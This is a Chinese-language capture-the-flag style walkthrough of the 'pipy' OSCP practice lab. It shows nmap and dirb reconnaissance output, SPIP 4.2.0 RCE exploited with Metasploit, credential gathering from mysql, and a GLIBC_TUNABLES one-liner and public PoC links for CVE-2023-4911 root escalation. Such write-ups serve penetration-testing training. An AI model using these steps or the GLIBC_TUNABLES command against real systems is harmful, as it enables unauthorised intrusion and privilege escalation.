OSCP 靶场
靶场介绍
pipy |
easy |
spip 利用、内网凭据收集、mysql 利用、CVE-2023-4911利用 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -Pn -p- -T4 192.168.1.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-27 20:28 EST
Nmap scan report for 192.168.1.55
Host is up (0.00053s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
MAC Address: 08:00:27:32:34:5E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.36 seconds
目录扫描
┌──(root㉿kali)-[~]
└─# dirb http://192.168.1.55
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Feb 27 20:29:27 2024
URL_BASE: http://192.168.1.55/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.55/ ----
==> DIRECTORY: http://192.168.1.55/config/
==> DIRECTORY: http://192.168.1.55/ecrire/
+ http://192.168.1.55/index.php (CODE:200|SIZE:7519)
==> DIRECTORY: http://192.168.1.55/javascript/
+ http://192.168.1.55/LICENSE (CODE:200|SIZE:35147)
==> DIRECTORY: http://192.168.1.55/local/
==> DIRECTORY: http://192.168.1.55/prive/
+ http://192.168.1.55/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://192.168.1.55/squelettes-dist/
==> DIRECTORY: http://192.168.1.55/tmp/
==> DIRECTORY: http://192.168.1.55/vendor/
---- Entering directory: http://192.168.1.55/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
权限获取
通过目标扫描可以发现spip 版本为 4.2.0 ,我们使用searchsploit 漏洞库可以发现存在RCE。
直接利用msf 的内置模块获取权限
权限提升
从mysql 数据库中找到用户的账户密码
通过如下命令发现存在 Glibc ld.so本地权限提升漏洞(CVE-2023-4911) ,该漏洞利用 GNU C 库的动态加载器 ld.so 在处理 GLIBC_TUNABLES 环境变量时存在缓冲区溢出漏洞。允许本地攻击者在运行具有SUID权限的二进制文件时通过恶意的 GLIBC_TUNABLES 环境变量来提升系统权限。poc 及检查命令如下:
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "G=`printf '%08192x' 1`" /usr/bin/su --help
https://github.com/leesh3288/CVE-2023-4911#poc-of-cve-2023-4911-looney-tunables
https://github.com/RickdeJager/CVE-2023-4911
下载exp,make 编译后,直接提取到root 权限
,
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】pipy
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论